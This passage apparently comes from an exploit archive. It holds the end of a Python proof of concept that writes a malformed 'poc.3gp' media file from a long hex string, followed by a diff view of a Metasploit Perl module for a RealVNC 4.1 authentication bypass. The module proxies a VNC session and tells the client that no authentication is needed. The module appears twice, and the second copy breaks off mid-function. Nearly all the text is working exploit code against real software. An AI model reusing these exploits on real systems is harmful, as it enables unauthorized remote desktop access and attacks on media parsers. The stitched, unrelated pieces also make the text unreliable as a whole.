\x1A\xED\xE3\x63\x45\xD4\x20\x8F\xFF\x04\x95\x4A\x95\x83\x33\xEE\x7D\x3A\xCF\x04\xBB\x82\x90\xC2\x14\x53\xF3\xA7\x67\x26
\xDE\x48\xDE\x84\x64\x57\x83\x2C\xA9\xC8\xD5\x0B\x73\xDB\x1B\xBB\xDE\x24\x31\x33\x04\x17\x94\xA6\x16\x81\xE1
\x3F\x7D\x5E\x0E\xB3\x6D\xE8\xCF\x86\x5D\xB2\xD5\x54\xB6\x52\x95\x48\x89\x89\x28\xB7\xD2\xA6\xB0\x8F\xFF\xEF\x00\x00\x01
\xB6\xE5\xE2\x27\xFF\xBA\xF5\x85\x26\x71\x77\x17\x71\x58\x16\x28\x9B\xBD\x43\x4F\x38\xA5\xB8\x4A\xF3\xF2\xBE\xE1
\xAE\x5E\xEA\xEA\xEA\xFB\x19\x3B\xED\x38\x84\x30\x75\xEF\xA9\x9C\x30\xAB\xE9\x9D\x34\x99\x8F\xD6\x6F\xAC\x5D\xCB\x40\x28
\xED\x3C\xBC\xF6\x68\x1C\x03\x88\x98\x3C\x49\x04\xCC\xDA\x98\xB4\x50\xA2\x3F\xFB\xC7\xE0\x89\xA4\x6B\x78\xD3\x9F\xB8
\xAE\x15\x6D\xC0\x49\x84\x6B\x50\xA9\x72\x03\x57\x81\x67\x25\x89\x68\xC0\xC8\x34\xA5\x8D\x72\x95\x14\xBF\xE5\xFE\x80
\x6D\x50\xEF\x37\xAD\x0B\x3F\x27\x47\x4F\x23\xA9\xCA\x72\x88\x8D\x72\xB0\xB1\xDF\x45\x99\x51\x29\x41\x60\xBC\x14\x56\x29
\xDF\xEF\x51\xF9\xB2\xC7\xA9\x03\x73\xEB\xEA\x0B\x14\xC1\x81\x9C\x35\x34\x47\x63\x0E\xA8\xCE\xD8\x95\xEA\xA8\x1B\x4B\x05
\xF2\xAB\x82\x52\x82\xFF\x88\xCA\x64\xFA\x4B\xCD\xA2\xF4\x4D\x3C\x4B\x12\x4B\x80\xF5\xDF\x74\xBB\xF3\x7D\x5B\x9D\x84\xE7
\xDD\x6E\x57\x73\xED\xD5\x29\x3B\x05\x21\x6B\xD5\x49\xBD\xD7\x2A\x57\x54\x00\x51\x1A\x35\x39\x16\xEA\x99\x77\xF9\x75
\x4C\x95\xB2\x3D\xFD\xCC\x8C\xFF\x89\x3C\x68\xCC\xBC\x45\x07\x0E\x25\xB6\x52\x5F\x76\x8F\x65\x59\x12\x22\x2A\x07\xE4\x95
\x55\x69\x5D\xF3\x6D\x6B\x88\xA1\xC2\x93\x4F\x9E\xB0\x0D\x5D\xCC\xC4\x89\x05\x98\x68\x52\xF9\xD2\x0C\x29\x90\x99\xB5
\x7A\x1F\x11\x9F\x34\xD2\xCE\x8C\x9A\xC4\x31\x83\x2A\x78\xE9\x2C\x13\x82\xF0\x4A\x09\x7B\xF0\x7B\xE5\x0C\x3E\x7B\xDE\xF6
\xA8\xE6\xF6\xF4\x73\xA3\x24\xB2\x6E\x41\xC3\x17\x90\xF1\xF3\x8E\xAD\xFB\xDD\x5A\x98\x94\x87\x20\x75\x1C\xE2\x80
\x2E\x8F\x21\xC8\xAB\x70\x76\x50\x2E\xAD\x9C\xFF\xEF\x00\x00\x01\xB6\x54\xC2\x67\xFF\xBA\xF2\x41\xC2\x22\x42\xB6\xC5\xC1
\x7B\x9C\x1B\xB8\xBA\xC1\x4C\x2A\x63\x97\x68\x8B\x41\x55\xA3\x07\x49\xA2\x9F\x38\x4B\x3B\xAD\x83\x0C\x8A\x17\xC2\x30
\x2B\x60\x21\x1A\x7A\xE8\xC2\x17\x63\x5B\xD4\x42\xD0\xA9\xB5\xC6\x2C\x05\x4E\x3A\x69\x93\xF7\x75\xB0\x1C\xA2\x36\x6E\x32
\x88\x58\x02\x0F\xB2\x77\xFC\xFA\xC8\x45\xCC\x5B\xBA\xDF\x95\x81\xAF\x81\x47\xA1\x38\x31\xA1\xBB\xC5\x2A\x81\xC1\x50\xD4
\x14\x2E\x0B\xD0\xD4\x58\x5B\x3E\x3A\xB2\x7C\x60\x34\x21\xCE\x61\x69\x84\xCC\xFD\xA4\x9B\x06\x5E\x1E\x97\x45\x34
\x7A\x0C\xD5\x8A\x48\x4A\x18\x3E\x86\x17\xF6\xC9\x9D\x6D\xA2\x52\x4E\x10\x0F\x92\xAC\x9A\xA4\x0B\x28\xC4\x22\xDD\x6C\xF2
\xFC\x58\x8F\xD5\x84\xA0\xC5\x0F\xDC\x19\x04\x3C\x2A\xAD\x1B\x51\x47\xED\x8D\xA8\xC8\x29\xB5\x65\x93\x41\x89\xD8\xE2\x12
\x13\x11\x8F\x95\xB6\xAB\x6B\x5F\x06\x38\x78\x7C\x24\xCB\x6F\xB1\x2A\x4E\xB9\x20\x59\xA7\x88\xF5\x6F\xB0\xFF\x6D\xB2
\x8E\x87\x7C\xE0\x88\xA4\x76\xD5\x2D\x21\x9C\xFC\x64\xF1\x1A\x4A\xD4\xBC\xD1\x70\x79\xC1\x56\x74\x34\x16\xA6\xAB\x21\x46
\x2D\xD6\xC1\x86\xA4\x23\x30\xB6\x4D\x05\x19\x65\xBE\x9E\xED\x97\xBE\xC1\xE8\xEF\xDE\x59\xCC\x05\x31\xF8\xFD\x57\xB2\x09
\x63\xE5\x72\x89\x56\xE6\x2C\xAE\xEF\x09\x2C\x70\xFB\x84\x5A\x0A\x14\xFC\x3E\x63\x6F\x98\xD3\x49\x30\xF4\x69\x8E\x23\xE3
\x63\x51\x82\xD6\x16\x25\x05\x13\xCF\x9E\x35\xC8\x98\x81\x64\x57\x73\xCA\x53\x9D\x33\x18\x72\xEE\xCB\xBD\x67\x66\x9C\xD1
\xDE\x64\x11\x95\xA9\xA0\x4F\xD6\x58\x52\x34\x97\x89\x05\xB1\x55\xA0\x44\x7B\xA0\x4A\xF8\x5A\x44\x45\x26\x20\xB3
\x3E\x5F\xF0\x34\x08\x6A\xF4\x47\x65\x65\x87\x1A\x63\xB2\x72\x01\xC6\x40\x83\x64\x44\xE8\x0E\x2A\xF0\xCF\x99\xF1\x09\xA9
\xC7\xB8\x33\x89\xE5\xDE\x9D\x77\x14\xF9\x22\x0E\xBF\x83\x90\x33\x86\xB8\x74\xE7\xF8\x98\x15\x67\xD6\x81\x51\x5D\x44\x10
\x73\x6F\x49\x0A\x5B\x70\xD2\x92\xF2\x03\x19\x64\x5B\xFF\x66\x7B\x5A\xCE\x13\x38\xB7\x6B\xDC\x34\xE9\xE6\x6A\xE4\x05\x61
\x01\x98\x90\xE3\xF5\xF6\xE8\xEE\x81\x31\xD8\x0F\x7B\xFF\xF7\x00\x00\x01\xB6\x55\xE2\x27\xFF\xBA\xF2\x4C\x54\x21\x15
\xDB\x1A\x5C\xF9\x1E\xB6\x4F\xCD\x11\x22\xD2\x06\xF3\x05\x4C\x09\x16\x81\x11\x59\xFB\x4E\x0A\x4E\x12\xFC\xFA\x82\x5D\x82
\x03\xD2\xF5\x00\xE4\xF1\x47\x62\x58\x5A\xE1\xBC\x28\x94\xE4\xDD\x66\xEC\x27\x1C\x16\x8C\xFA\x48\x34\x37\x54\xE7\xB2\x76
\x64\xCB\x4F\xAC\x47\xA2\xC3\x3D\xC2\x8F\x50\x61\x79\x2C\xA5\x2E\x74\x91\xA4\x4E\x4E\xE3\xBD\xF1\x92\x07\x5D\x60
\xEB\xDF\x05\x20\x15\x06\x28\x0C\xCD\xBC\xD1\x11\xFB\x74\x23\x25\xFB\xA3\x51\xA1\x9A\x71\xB9\x43\xA1\xF2\xC7\x7A\xB4\x90
\xF1\x0E\xE8\x39\xB0\x75\x13\xF6\x5C\xF7\x34\xB1\x73\xC3\x7D\x1A\x00\xB7\x30\x74\x69\x80\xA5\x65\xCA\xA5\xA0\x75\x03\x43
\x93\x4A\x79\xA7\x97\x94\x67\x02\xB5\xC8\x37\x15\x10\x77\xEF\xB6\xA9\x29\x43\xCF\x2A\xF8\x1B\x55\x00\xAD\x19\x19\xAD\x77
\x8F\x4C\x95\xDE\xE8\x19\xB3\x35\x64\x24\x3C\xC2\x54\xEC\x6F\x05\x61\xD1\x13\x12\xE2\x86\xB8\x29\xAC\x8B\x13\xA1\x67\x90
\x90\x8F\xD5\xC6\x46\x4A\xBA\xD8\x17\xE2\x07\x19\x36\x6C\xF9\x38\x88\x96\x14\x56\x9F\xDB\x97\x00\xE6\xCF\x2B\xA9\xB6
\x5E\x11\x17\x29\x1D\xFB\xD7\x85\xEC\xCC\x38\x43\x66\xC9\xB6\x6B\x4D\x02\x69\xF2\x41\x6F\x28\xF7\xD4\x46\x99
\x9A\xDB\x3E\x16\x40\x57\x9D\x07\x34\x72\x98\x2C\xD6\x9E\x06\x77\x02\xCE\x65\xED\x5C\x27\x5C\xF9\xBA\x4A\xB1\x89\x05
\xFF\xC9\x13\xED\x98\x8B\x76\x21\xA4\x6B\x7E\x53\x29\xA7\x81\xF7\x10\x99\x0D\x01\x7F\x55\x70\x98\xCB\xD1\x6A\x53\x46\xD3
\xF2\x08\x22\xC3\xAF\xB0\x66\x1A\xC5\x4B\xEC\xE9\xCF\xD9\x56\x21\x8B\x1F\x29\x18\x66\x61\x61\x80\xE1\x86\x7F\x0C\xE5
\x1E\xCD\x75\xE9\x59\x64\x38\x46\x9C\xA1\xC4\x0D\xEE\x81\x94\x4C\x1B\xEF\x79\xDC\xBF\xE8\x22\x0C\xD0\x3A\x70\xA0\x80\x89
\xA8\xFC\x16\xFF\xFA\x06\xD8\x2A\xBA\x52\xEE\x5C\x5E\x6A\x02\x16\xCA\x9C\x2A\x70\x52\x56\x28\x54\xCB\x3A\xE6\x49\x52\xE2
\x51\xAF\x12\x90\x8D\x08\x3D\x5B\x4E\x62\x33\x4D\x13\x14\xA5\xDD\xA4\xE8\x4E\x28\x29\x10\x8B\x0E\x0A\x07\x0B\x07\x67\x93
\x30\xE5\xC2\x40\x95\x7D\x6A\x8F\xDF\xCB\xD5\x04\xDB\x6B\x1E\xD6\xC0\x91\x2A\x44\x95\x01\xAE\x99\x29\x60\xF2\x0D\x06\x47
\x39\xC3\xEA\xE6\x72\x1E\x28\x6B\x77\x4E\x4A\x55\xCB\xE6\x27\xB5\x28\x60\x57\xCF\xC5\x8E\x9F\xFF\xBF\x00\x00\x01\xB6\x56
\xC2\x27\xFF\xFB\x01\x5F\xE8\xE8\x02\x37\x06\xF6\x02\x89\xCA\x05\x11\xFF\x00\x43\x82\x22\x46\x65\x36\xEE\x51\xA8\xCF\x84
\x6B\x22\x61\xCB\x03\x13\x0C\x00\xE7\x62\x70\xE4\xF0\xDB\x19\xD4\x2D\xA0\x9C\xFB\x4B\x0E\x9A\xA5\x5D\xF1\x97\xBB\x65
\x3F\x08\xDC\xE5\xF8\x2B\x8C\x3B\x78\x8D\xB8\x17\xF7\x9B\x56\x96\x03\xBC\xE3\x37\xA0\xAE\x3E\xF2\xDE\x34\x80\xF0\x56
\x9A\xD5\x3A\xB1\x02\x7E\x0D\x60\x57\x01\x3C\x0A\x4D\x02\xB9\x00\x68\xA8\x05\x83\x28\x9A\x3C\x54\x06\x6F\xBD\xA9\x7E\xE8
\x40\x6D\x13\x05\xC6\xCE\x04\x12\xE9\xE8\x25\x0F\x2F\x94\xA9\xAD\x08\xBC\x64\x02\x79\xDF\xE3\x4C\x21\x7A\xC8\x0D\x97
\x5A\x07\x15\xAF\xEF\x5A\x34\x27\xF1\x87\xE5\x11\x9E\x08\x4A\x3F\xFF\x89\x7B\x64\x1F\xA8\x51\x91\x30\x50\xBB\x12\x62\x24
\xC0\x51\xD9\xB6\x14\x85\x0D\x04\x39\x5E\x86\xA4\x9E\x1C\xD2\xC8\xF2\x2E\x61\x38\x1E\x05\x20\xC7\xEC\x12\x88\x63\x00
\x8F\x43\x57\xD1\xB2\xFC\xEA\x32\x05\xA6\x46\x4A\x91\x48\xBA\xC2\xA4\x5E\xA3\x59\xC5\x2B\x90\x5A\x66\x8D\x25\x8D\xC1\x98
\x37\x7E\x07\xBE\xD0\x16\xF3\x2D\x29\xFE\xD4\xC4\x50\xB0\x50\x5C\xDF\xBD\x60\x29\x95\x75\x7E\x15\x9E\x05\x37\x67\x2E\x01
\xB1\x71\x75\x54\x07\x2F\x89\xE6\xA8\xF1\x62\x13\x92\x41\x19\x36\x15\x1E\x5C\xF9\x1B\xAB\x51\xFA\x72\x0F\x20\x89
\x9E\x1A\x73\x9B\xA4\x8B\x83\x10\xEC\x6D\x43\x0F\x5D\x05\xBB\xDE\x99\x24\x59\xCC\x30\x33\xED\xD6\x1F\x3E\x44\x68\xC9\xA1
\x3E\x71\x72\x13\x33\x98\x69\x67\xCE\x95\x8D\xB8\xE0\xA4\x87\x86\x2F\x9B\x37\x16\x6C\x2C\x1A\x8E\x94\x8E\x9A\x25\x4C\x28
\x2B\xC7\x80\x32\x83\x0E\x8B\xC7\xAA\x15\xD5\x3C\xE2\x9F\xB7\x63\x02\x37\xB2\xBE\xF3\xC2\x31\xAF\x7E\xA9\xAA\x31
\x1A\xDF\x6C\xE8\x47\x94\x6F\xC3\x99\xAD\x29\xE7\x4D\x23\x3C\x9B\x5E\x2C\x6B\x3C\x8E\x64\xE1\xD4\x87\x19\x7E\x20\xA1\xE1
\xE8\xEA\xFC\x37\xD0\xAA\x31\x1C\x68\x34\x1C\x30\x47\x07\x72\x70\xC4\x20\x9F\x95\x8C\xE9\x43\xA5\xCF\x3C\x88\xD9\x23\x92
\xC6\xE0\xB6\xDB\xF9\x65\x94\x46\x66\x11\x01\xCF\xE5\xFA\x8F\xD9\x59\xCE\x0C\x97\x47\xBA\xA5\x14\x1A\x9F\x58\x0D\x03\x30
\xDF\x16\xDE\x69\x13\x83\x36\xB3\xA7\x21\xDA\x4C\x32\xF7\x60\x1A\x3C\x45\xF9\x99\x81\x64\x65\x87\x70\x46\x44\x7F\x8C\x31
\x0D\x14\xFC\xC8\xC9\x33\x5C\x90\x29\xE1\xD0\x84\x5E\x07\xA4\x56\x3D\xB6\xC5\x6C\x72\x61\x8F\x55\x5E\x57\x65\x57\xE5
\x2A\x1A\x53\xDC\x1A\x84\x7A\xAA\xB6\x2D\x99\x3E\xA1\x05\xBD\xD0\x76\x91\x25\xAA\x7B\x0F\x0A\x94\x61\x33\x51\x86\x82\x97
\x85\x4E\xC2\x83\x57\x8E\x2F\x03\x68\x1D\x03\xA7\x12\x2B\x1A\x31\x4E\x73\x26\xA9\xCE\xC6\x93\x11\x36\x23\xD7
\xBC\xFF\xFD\x01\x40\x40\x06\xF7\x70\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0F\x00\xF0\xBB\xA4\x3E\x0F\x87\x90
\x82\x6F\xE0\x03\x76\x08\x08\x15\x56\x73\x3E\x2C\xFD\xA0\x23\x9E\x24\xC7\x0A\xA0\x41\x1C\x29\x62\x94\xA6\x0C\x5C\xC3
\x1F\x78\x9F\xC3\x8F\x0F\xC7\x38\x84\x2E\x9F\xF1\xA9\xE6\x0D\x16\xEC\xBF\xF2\xAB\x21\x5C\x7D\xD7\x04\x70\xA9\x7A\x2F\x03
\xFA\xE5\xE1\x0B\x1F\x6F\x3F\x1C\x8E\x32\x04\x2F\x54\x26\x78\x50\x2F\x9D\xDD\x5F\x8D\x0F\x14\xB3\xAC\x63\x45\x86\x88\x48
\xF4\xB6\x84\xDF\x8D\x86\x88\x51\xD5\x3A\x7F\xE9\x14\xD7\x05\xCD\x19\x97\xD1\xA2\xF1\xDD\x31\x1F\x35\x30\xB6\x97\x76
\xEF\x62\x6E\xCE\x99\xD9\x5A\xA3\xC5\x27\xBC\x20\x1D\x01\x1E\xBA\xD8\xBE\xA6\x8D\x92\x13\x90\xDA\x41\x44\x49\x0B\x72\x54
\x00\xBC\x7F\x5E\xF0\xDE\xB5\x40\xC4\x17\x42\x6D\xC6\xC9\x28\x15\x4D\x9C\x04\x05\xF1\x1A\xCD\xF3\x32\x5F\xBC\x0A\x70
\x1A\x48\x2F\x30\x0F\x96\x7D\xA3\x45\xE0\xB5\x67\x49\x6B\x4D\x85\x78\x5E\x01\x97\x03\x11\xBB\xDA\x42\x04\x43\xF0\x35
\x6C\x0C\x37\x81\x1A\x98\xD9\xC3\x9E\xAE\xA6\x6E\xAB\xAB\xD8\xA4\x64\x28\x70\x74\x3E\xB0\x6E\x31\x6D\xF5\x51\xA8\xF5\x36
\xD7\x2B\x97\x74\x0B\x4B\x5A\x75\xD0\x6F\x64\x23\xAB\xC5\x6F\x05\xA4\x74\xF7\xA2\xBC\x08\x75\x47\x58\xF0\x78\x12\x67\xA8
\x2F\x32\xC7\x78\x57\x1D\xFA\x36\xB6\x32\xD4\xFC\xD4\xFA\xC4\x00\x57\x8C\xAB\x09\xF7\xC8\x98\xC0\x12\xCF\xB0\xDD\xA6\x60
\xCA\xD5\x1A\x61\xAD\x41\xF6\xEE\xF8\x22\x60\x60\x12\xBF\x69\x57\x9A\x70\x01\x2D\x1A\x0D\x19\x26\x1E\xB6\xF3\x59\x93\x30
\x2D\xF8\x70\x58\x9F\xF6\x6F\xA5\x3B\x5D\xC4\x1C\x16\x58\xD2\xAA\xBD\x01\x4E\xD5\xA2\x08\xD6\x12\x0C\x52\x6F\x9D\x0C\x55
\xEF\x41\x56\x30\x02\xD2\x05\x00\x50\x3C\xDC\x43\x64\x46\x40\xB7\x91\x47\x34\xA3\x3C\x8A\xDC\xC9\xD6\xA4\x42\x0F\x40\xA3
\x91\x78\x85\x88\x4A\x79\x11\x13\x43\x37\xCC\xE3\x40\x60\xC3\xB3\x6C\xFB\x9D\x26\xEB\x8F\x1A\xAE\xB9\xA4\x00\xE0\x07\xF9
\xDF\x62\x2B\xE7\xC9\x4B\x1D\x77\xD9\x2B\x1B\x47\x89\x6C\x84\xBD\x89\x1C\xE4\x23\x7A\xE7\xB9\xD8\xCA\x6A\x17\x68\x88
\xCF\x0A\x16\x82\x49\x7B\x8E\x83\xD9\x1E\xC5\x54\x44\x9A\x33\x69\x4D\xC7\x6C\xE4\xD2\xC9\xF8\x1B\xFB\x63\x79\xE8
\x9A\xEB\xFE\x73\xE8\xE0\x5A\xF8\x61\xEE\xB4\xE7\x3F\x4E\x0D\xBA\x11\x9F\xBD\xB6\xD7\xF2\xA6\xC9\xF7\xCE\xF8\x6C\x4E\x93
\xBE\x0E\xB0\x51\x49\xC6\x9F\x2C\xDB\x10\xF3\x46\xB8\xFC\x7C\xED\x30\x3F\x01\x50\x15\xA4\x8C\xA5\x3A\x26\x02\x43\x34\xB1
\x80\x5D\xFC\xC5\x3C\x8A\x00\xBC\x0B\x00\x4E\xEE\x2E\xC3\xE6\xB5\xAF\xC7\x49\x53\xFB\xB9\x80\x61\xFA\xF1\xB5\x33\x07
\xBD\xD0\x28\xA9\x0A\x97\x2B\xE3\xD4\x15\x58\x9D\xE3\x31\xD5\xC8\xA4\x7D\xD3\xAE\x29\xB1\xCB\x0E\xEA\x84\x57\xA9\x86\xF2
\xB2\x1F\xC5\xF8\x11\xF4\x53\xE7\x6F\xE1\x36\x73\x12\xDB\x6B\x3A\xF7\xE4\xF8\x59\x74\x84\x12\x93\x5A\x9D\x3A\x16\xCF\xB9
\xC3\x33\x4C\x7E\x54\x10\x77\x2D\x41\x11\x48\x0F\xA0\x77\xF1\xE8\x56\x09\x93\xDA\x13\x67\x4F\x5A\xA4\x67\x6B\x8B\xEA\x86
\x2C\x44\x10\x53\x12\xD1\x61\x55\x7B\x68\x02\x78\x26\x11\x67\x9F\xF5\x77\x55\xB5\xA7\x4E\xC3\x36\xBE\xC5\x4E\x7D\xE9\xD5
\xCB\x48\x07\x01\x52\x15\x9D\x14\x66\x11\xA9\x08\xC2\x35\xAA\x50\x03\x00\x06\xEC\x05\xB1\x60\x23\x5B\x5B\x3D\x67\x75
\xED\x1E\x8E\xF4\x3D\x70\x22\x43\xA9\x72\xB0\x1C\x8C\x1C\x42\x79\x22\x8E\xD3\xB8\x05\x1A\xA1\x1D\x0E\x9F\x31\x6D\x2D\x59
\xF9\x4D\x04\xEE\xDD\xD5\x7A\xB8\x7D\xEC\xA6\x65\x7C\xEB\x40\x53\xF9\xF3\xD7\xBD\xAF\xF5\xBF\x27\xB5\xDC\x53\xB6\x3D\x68
\x53\xCE\xE3\xD9\x4E\x14\x29\x29\x24\x1C\x20\x4A\xE0\xDC\x33\x25\xC9\xB2\x75\x22\xE2\xEC\x76\x0E\x38\x96\x6B\xE8\x89\xC0
\x50\x9D\x03\x5A\x00\x5E\x71\xCF\x61\x74\xC5\x55\x01\x4A\xC7\x30\x5D\xAD\xEA\x60\x0E\xAD\xC7\x3B\xC6\xED\xCE\x40\x0E\x01
\x4E\x15\x99\x56\x15\x31\x25\x4E\x2A\x66\x52\xD2\xCF\x7C\x0E\x80\xC0\x4A\x03\x52\x94\x02\x9D\x98\xE6\x45\xA8\x02
\x9C\xBA\x7C\xFA\x25\xB2\x00\x59\x1D\x59\x76\x47\xD9\x6A\xDC\x26\xE8\xB7\x68\x76\x44\x8C\x3D\xFB\xC7\x42\x07\xE8\x63"
outfile = file("poc.3gp", 'wb')
outfile.write(data)
outfile.close()
print "Created Poc"

View file

@ -1,214 +1,213 @@
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::realvnc_41_bypass;
use strict;
use base "Msf::Exploit";
use Pex::Text;
use IO::Socket::INET;
use POSIX;
my $advanced = {};
my $info =
{
'Name' => 'RealVNC 4.1 Authentication Bypass',
'Version' => '$Revision: 1.1 $',
'Authors' => [ 'H D Moore <hdm[at]metasploit.com>' ],
'Description' =>
Pex::Text::Freeform(qq{
This module exploits an authentication bypass flaw in version
4.1.0 and 4.1.1 of the RealVNC service. This module acts as a proxy
between a VNC client and a vulnerable server. Credit for this should
go to James Evans, who spent the time to figure this out after RealVNC
released a binary-only patch.
}),
'Arch' => [ ],
'OS' => [ ],
'Priv' => 0,
'UserOpts' =>
{
'LPORT' => [ 1, 'PORT', 'The local VNC listener port', 5900 ],
'LHOST' => [ 1, 'HOST', 'The local VNC listener host', "0.0.0.0" ],
'RPORT' => [ 1, 'PORT', 'The remote VNC target port', 5900 ],
'RHOST' => [ 1, 'HOST', 'The remote VNC target host'],
'AUTOCONNECT' => [1, 'DATA', 'Automatically launch vncviewer', 1],
},
'Refs' =>
[
['URL', 'http://secunia.com/advisories/20107/']
],
'DefaultTarget' => 0,
'Targets' =>
[
[ 'RealVNC' ],
],
'Keys' => [ 'realvnc' ],
'DisclosureDate' => 'May 15 2006',
};
sub new
{
my $class = shift;
my $self;
$self = $class->SUPER::new(
{
'Info' => $info,
'Advanced' => $advanced,
},
@_);
return $self;
}
sub Exploit
{
my $self = shift;
my $server = IO::Socket::INET->new(
LocalHost => $self->GetVar('LHOST'),
LocalPort => $self->GetVar('LPORT'),
ReuseAddr => 1,
Listen => 1,
Proto => 'tcp');
my $client;
# Did the listener create fail?
if (not defined($server))
{
$self->PrintLine("[-] Failed to create local VNC listener on " . $self->GetVar('SSHDPORT'));
return;
}
if ($self->GetVar('AUTOCONNECT') =~ /^(T|Y|1)/i) {
if (! fork()) {
system("vncviewer 127.0.0.1::".$self->GetVar('LPORT'));
exit(0);
}
}
$self->PrintLine("[*] Waiting for VNC connections to " . $self->GetVar('LHOST') . ":" . $self->GetVar('LPORT') . "...");
while (defined($client = $server->accept()))
{
$self->HandleVNCClient(fd => Msf::Socket::Tcp->new_from_socket($client));
}
return;
}
# Stolen from InjectVNCStage.pm
sub HandleVNCClient
{
my $self = shift;
my ($fd) = @{{@_}}{qw/fd/};
my $rhost;
my $rport;
# Set the remote host information
($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr);
# Create a connection to the target system
my $s = Msf::Socket::Tcp->new(
'PeerAddr' => $self->GetVar('RHOST'),
'PeerPort' => $self->GetVar('RPORT'),
'SSL' => $self->GetVar('SSL')
);
if ($s->IsError) {
$self->PrintLine('[*] Could not connect to the target VNC service: ' . $s->GetError);
$fd->Close;
return;
}
my $res = $s->Recv(-1, 5);
# Hello from server
if ($res !~ /^RFB 003\.008/) {
$self->PrintLine("[*] The remote VNC service is not vulnerable");
$fd->Close;
$s->Close;
return;
}
# Send it to the client
$fd->Send($res);
# Hello from client
$res = $fd->Recv(-1, 5);
if ($res !~ /^RFB /) {
$self->PrintLine("[*] The local VNC client appears to be broken");
$fd->Close;
$s->Close;
return;
}
# Send it to the server
$s->Send($res);
# Read the authentication methods from the server
$res = $s->Recv(-1, 5);
# Tell the client that the server only supports NULL auth
$fd->Send("\x01\x01");
# Start pumping data between the client and server
if (! fork()) {
$self->PrintLine("[*] Proxying data between the connections...");
$self->VNCProxy($s->Socket, $fd->Socket);
exit(0);
}
return;
}
sub VNCProxy {
my $self = shift;
my $srv = shift;
my $cli = shift;
foreach ($srv, $cli) {
$_->blocking(1);
$_->autoflush(1);
}
my $selector = IO::Select->new($srv, $cli);
LOOPER:
while(1) {
my @ready = $selector->can_read;
foreach my $ready (@ready) {
if($ready == $cli) {
my $data;
$cli->recv($data, 8192);
last LOOPER if (! length($data));
last LOOPER if(!$srv || !$srv->connected);
eval { $srv->send($data); };
last LOOPER if $@;
}
elsif($ready == $srv) {
my $data;
$srv->recv($data, 8192);
last LOOPER if(!length($data));
last LOOPER if(!$cli || !$cli->connected);
eval { $cli->send($data); };
last LOOPER if $@;
}
}
}
}
1;
# milw0rm.com [2006-05-15]
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::realvnc_41_bypass;
use strict;
use base "Msf::Exploit";
use Pex::Text;
use IO::Socket::INET;
use POSIX;
my $advanced = {};
my $info =
{
'Name' => 'RealVNC 4.1 Authentication Bypass',
'Version' => '$Revision: 1.1 $',
'Authors' => [ 'H D Moore <hdm[at]metasploit.com>' ],
'Description' =>
Pex::Text::Freeform(qq{
This module exploits an authentication bypass flaw in version
4.1.0 and 4.1.1 of the RealVNC service. This module acts as a proxy
between a VNC client and a vulnerable server. Credit for this should
go to James Evans, who spent the time to figure this out after RealVNC
released a binary-only patch.
}),
'Arch' => [ ],
'OS' => [ ],
'Priv' => 0,
'UserOpts' =>
{
'LPORT' => [ 1, 'PORT', 'The local VNC listener port', 5900 ],
'LHOST' => [ 1, 'HOST', 'The local VNC listener host', "0.0.0.0" ],
'RPORT' => [ 1, 'PORT', 'The remote VNC target port', 5900 ],
'RHOST' => [ 1, 'HOST', 'The remote VNC target host'],
'AUTOCONNECT' => [1, 'DATA', 'Automatically launch vncviewer', 1],
},
'Refs' =>
[
['URL', 'http://secunia.com/advisories/20107/']
],
'DefaultTarget' => 0,
'Targets' =>
[
[ 'RealVNC' ],
],
'Keys' => [ 'realvnc' ],
'DisclosureDate' => 'May 15 2006',
};
sub new
{
my $class = shift;
my $self;
$self = $class->SUPER::new(
{
'Info' => $info,
'Advanced' => $advanced,
},
@_);
return $self;
}
sub Exploit
{
my $self = shift;
my $server = IO::Socket::INET->new(
LocalHost => $self->GetVar('LHOST'),
LocalPort => $self->GetVar('LPORT'),
ReuseAddr => 1,
Listen => 1,
Proto => 'tcp');
my $client;
# Did the listener create fail?
if (not defined($server))
{
$self->PrintLine("[-] Failed to create local VNC listener on " . $self->GetVar('SSHDPORT'));
return;
}
if ($self->GetVar('AUTOCONNECT') =~ /^(T|Y|1)/i) {
if (! fork()) {
system("vncviewer 127.0.0.1::".$self->GetVar('LPORT'));
exit(0);
}
}
$self->PrintLine("[*] Waiting for VNC connections to " . $self->GetVar('LHOST') . ":" . $self->GetVar('LPORT') . "...");
while (defined($client = $server->accept()))
{
$self->HandleVNCClient(fd => Msf::Socket::Tcp->new_from_socket($client));
}
return;
}
# Stolen from InjectVNCStage.pm
sub HandleVNCClient
{
my $self = shift;
my ($fd) = @{{@_}}{qw/fd/};
my $rhost;
my $rport;
# Set the remote host information
($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr);
# Create a connection to the target system
my $s = Msf::Socket::Tcp->new(
'PeerAddr' => $self->GetVar('RHOST'),
'PeerPort' => $self->GetVar('RPORT'),
'SSL' => $self->GetVar('SSL')
);
if ($s->IsError) {
$self->PrintLine('[*] Could not connect to the target VNC service: ' . $s->GetError);
$fd->Close;
return;
}
my $res = $s->Recv(-1, 5);
# Hello from server
if ($res !~ /^RFB 003\.008/) {
$self->PrintLine("[*] The remote VNC service is not vulnerable");
$fd->Close;
$s->Close;
return;
}
# Send it to the client
$fd->Send($res);
# Hello from client
$res = $fd->Recv(-1, 5);
if ($res !~ /^RFB /) {
$self->PrintLine("[*] The local VNC client appears to be broken");
$fd->Close;
$s->Close;
return;
}
# Send it to the server
$s->Send($res);
# Read the authentication methods from the server
$res = $s->Recv(-1, 5);
# Tell the client that the server only supports NULL auth
